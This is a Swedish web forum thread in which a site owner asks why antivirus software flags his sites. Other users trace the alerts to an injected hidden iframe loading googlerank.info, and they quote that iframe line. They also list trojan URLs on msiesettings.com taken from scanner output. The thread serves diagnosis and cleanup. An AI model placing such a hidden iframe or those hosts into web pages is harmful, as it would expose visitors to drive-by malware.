[webbteknik]

Får också detta meddelande från Norton när jag besöker sidan.

[Indigo]

Avast tycker inte heller om sidan, så nått klur är det...

[Frost]

Nu är jag snart gråhårig... fick det här svaret av loopia support:

"De meddelande som erhålls av ert eller kundens säkerhetsprogram informerar
att datorn är infekterad av nedanstående Malware vid namn
"Exploit.VBS.Phel.bl" som kan vara en säkerhetsrisk för datorn.

Jag kontrollerade även på Internet om denna Malware och den har inget
sammanhängande med webbservrar eller hemsidor därav varför vi inte hittar
något på er hemsida som är infekterat.

För borttagning av "Exploit.VBS.Phel.bl":
http://forums.zonealarm.com/zonelabs/board...alwareDiscussio
n&message.id=2178

För mer information om "Exploit.VBS.Phel.bl":
http://research.sunbelt-software.com/threa...Exploit.VBS.Phe
l.bl&threatid=55206

Vänligen återkom om några funderingar dyker upp."



Så de anser alltså inte att vår sida är smittad... men den verkar ju onekligen vara det??? Om någon kan hjälpa oss med detta så vore vi väldigt tacksamma, ger självklart ut en belöning också

[grazzy]

Hej,

Jag kan inte svära på att detta är skurken, men det ser onekligen _mycket_ misstänkt ut (och det förvånar mig lite att nån kan missa det ärligt talat).
Längst ned i din html-kod finns följande:


Det är nån lurig grej på googlerank.info (gud vet vad det är egentligen), den skapar iaf en massa nya iframes, som spottar ur sig riktigt scary javascript. Den försöker även kryptera koden så att den skall bli ännu mera \"dold\". Riktigt nasty.


Det verkar dessutom som att den bara visar sig en gång, när jag besöker sidan igen så får jag inte samma data utan bara 404. Hursomhelst så försökte den exekvera \"krypterad\" javascript så att det inte står i klartext vad för kodsnuttar den kör, men jag skulle gissa på att nån av alla de där iframsen innehåller din exploit.

[nicclas]

Japp, som Grazzy säger så har fler noterat att det är din iframe med "Googlerank.info" som ger problemet med "malware" som försöker laddas från domänen msiesetting.com
http://forum.powweb.com/showthread.php?p=426622

Har du satt dit den själv? Har du laddat upp HTML-koden från en dator med virus på?

[grazzy]

Jäkla lurig pryl dock, jag lyckas inte få fram den \"stygga\" koden igen hur jag än gör. Nån som kan få fram den? När jag telnettar till googlerank.info med \"rätt\" headers osv så får jag bara 404 eller andra skumma errors.

Skulle inte rekommendera att surfa på melta.se med javascript påslaget iaf..

[Davve]

Jag hade liknande problem för ett tag sedan. Några av mina sajter varnade för virus, trojan så fort man besökte dessa.

På nåt sätt har någon lyckats ändra mina index filer och lagt till skumma textrader. Det var bara att ta bort dessa för mig.

[Frost]

jäklar... det där såg inte alls lustigt ut, är min kollega som lagt upp allt med analytics men jag tror ju knappast han gjort något med flit, får ta och delete med en gång!
TUSEN TUSEN tack alla! Hoppas detta hjälper att ta bort skiten bara...

[citrusen]

EDIT: Dina övriga sidor verkar också vara infekterade , ex: Socionomer.se

detected: Trojan program Trojan-Downloader.JS.Agent.jy URL: http://s99.msiesettings.com/check/n404-1.php
detected: Trojan program Trojan-Downloader.VBS.Agent.ck URL: http://s99.msiesettings.com/check/n404-2.php
detected: malware Exploit.VBS.Phel.bl Script: http://socionomer.se/[3]

Här ligger en evil iframe på Socionomer . se liksom det gjorde på melta.

Kod:

<link rel="stylesheet" type="text/css" media="screen" title="Default" href="default.css">

	<script type="text/javascript" src="system/external.js"></script></head><body onload="javascript:externalLinks();"><iframe src="http://googlerank.info/counter" style="display: none;"></iframe>

googlerank.info har inget med google att göra så vitt jag vet, och ska vara registrerat i ryssland.



Orginal: Jag tror att de fått tillgång till er databas och via den vägen infekterat sidorna.

DLS. Saken är att din sida blev hackad, googlerank.info är registrerad i ryssland.

Registrant Contact Information:
Name: N/A
Organization: N/A
Address 1: N/A
City: N/A
State: Altayskiy kray
Zip: N/A
Country: RU
Phone: +007.0955050505
Email:[email protected]

De var väl intresserade av att stjäla era kunders uppgifter när de handlar med visakort etc etc.

[Frost]

Tusen tack för att du uppmärksammade det! Inte alls tjusigt, de sitter inte ens på samma ftp login.... får ta ett snack med loopia om detta